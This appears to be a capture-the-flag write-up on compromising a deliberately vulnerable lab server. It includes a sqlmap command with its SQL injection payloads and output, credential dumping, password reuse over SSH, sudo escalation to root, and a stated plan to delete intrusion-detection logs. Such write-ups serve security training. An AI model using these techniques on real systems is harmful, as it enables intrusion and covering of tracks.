Quite a few places to check! Let’s see what we’ve got.
This is not your regular mail server:
I’ve never seen this before, so I checked the project’s homepage:
SquirrelMail is a standards-based webmail package written in PHP. It includes built-in pure PHP support for the IMAP and SMTP protocols, and
very easy to configure and install. SquirrelMail has all the functionality you would want from an email client, including strong MIME support,
address books, and folder manipulation.
Ok, will come back to this, for now I’m just checking the entire thing for possible entry points.
Trying to get to this folder will pop up a basic authentication window. Moving on
This one gives an internal server error, but discloses the e-mail address of the server administrator: dstevens@localhost
Here we have a directory indexing with a db.sql file that contains the following:
Also, the search functionality is vulnerable to XSS! Ok, we have enough information to start poking deeper.
First thing I tried was to put a quote in the id parameter, and a SQL error popped up: Warning: mysql_fetch_row(): supplied argument is not a valid MySQL result resource in /var/www/html/pages/blog.php on line 20. Time to fire Sqlmap!
sqlmap -u "http://192.168.80.152/index.html?page=blog&title=Blog&id=2" -p "id" --dbms=MySQL --dbs
[06:05:45] [INFO] testing connection to the target URL
sqlmap resumed the following injection point(s) from stored session:
Parameter: id (GET)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: page=blog&title=Blog&id=2 AND 4151=4151
Type: AND/OR time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (SELECT)
Payload: page=blog&title=Blog&id=2 AND (SELECT * FROM (SELECT(SLEEP(5)))tueL)
Type: UNION query
Title: Generic UNION query (NULL) - 5 columns
Payload: page=blog&title=Blog&id=2 UNION ALL SELECT NULL,NULL,CONCAT(0x716a7a7671,0x61536d554d5745557253,0x7162716a71),NULL,NULL--
[06:05:45] [INFO] testing MySQL
[06:05:45] [INFO] confirming MySQL
[06:05:45] [INFO] the back-end DBMS is MySQL
web server operating system: Linux Fedora 5 (Bordeaux)
web application technology: Apache 2.2.0, PHP 5.1.2
back-end DBMS: MySQL >= 5.0.0
[06:05:45] [INFO] fetching database names
available databases :
I then looked at the ehks database, the interesting table contains usernames and password hashes:
With dstevens’ credentials I was able to log in both to the mail and admin panel. The admin functionality allows you to create another blog page, which I tested and it works. The mailbox was more interesting, because it was filled with OSSEC HIDS logs of my attacks! Will delete them before I’m done, but for now I scrolled all the way to the bottom to find some real mail:
I'm installing OSSEC v2 on the server - so I also had to install gcc and
binutils. Just wanted to let you know.
Ehks Data Research Center
I’m thinking this mail is not just for occupying storage, but it’s hinting that we’ll have to do some binary exploitation on the target..Anyway, there is more mail about the server setup:
the server is up and running now and should be able to support most of
our needs. Don and I are still working on installing a few more patches
and configuring things. Let us know if you have any problems. Thanks!
Sr. Unix Admin
Prof. Ehks Data Research Center
I think I got the server pretty much set up. I just have to make some
more adjustments. Unfortunately I couldn't get RoundCube installed
because our version of PHP is too low. I'll send more updates as I make
Prof. Ehks Data Research Center
There is also mail about a calendar feature that I wasn’t aware of:
I'd like to announce that the new calendaring software is online. You
all have accounts that you can log in with, they have the same username
and password as your machine accounts. Feel free to log into the new
system at http://192.168.0.6/calendar. Let me know if you have any
I’ve almost forgotten to check the /restricted folder, so I next did that. It worked with the pair of pmoore/Homesite. Inside there are 2 text files:
Instructions for Posting to the Blog
Just log into the admin section at http://192.168.0.6/admin.
Use your regular machine credentials (username and password).
Once you're logged in click the "Blog" link.
Instructions for Webmail
Browse to the URL http://192.168.0.6/mail
Log in with your regular machine credentials (username and password).
Use webmail ;)
Let Don or James know if you're having problems.
Just stuff we had figured on our own. I checked the PHP version, because of the mail hint, the headers mention it as being 5.1.2. Next I logged in for the calendar:
In the admin tab we can modify some calendar options and add a new user. Nothing too helpful in hacking the target, although I did try a RFI because a Nessus scan I’ve run indicated the calendar was vulnerable to arbitrary file inclusion. So the last thing left to try before thinking of more options was to see if I could login to SSH with any of the usernames and passwords I had. And I was able to get in the box from the first try, as dstevens!
I looked around in his home directory, the files related to the site are hosted there. Then I tried to read the /etc/sudoers file, and it worked with sudo and his password:
# User privilege specification
root ALL=(ALL) ALL
dstevens ALL=(ALL) ALL
achen ALL=(ALL) NOPASSWD:ALL
Well, look at these privileges! Then it’s all the matter of becoming root with a simple su:
[dstevens@ctf4 calendar]$ sudo su -
[root@ctf4 ~]# whoami
Game over! Although at the beginning there seemed to be multiple web avenues for exploitation, most of them were informational, and it was just the SQL injection that gave the keys to the kingdom. Lax permissions and password reuse facilitated the compromise of the target.
/ Q: How do you shoot a blue elephant? A: \
| With a blue-elephant gun. |
| Q: How do you shoot a pink elephant? A: |
| Twist its trunk until it turns blue, |
| then shoot it with |
\ a blue-elephant gun. /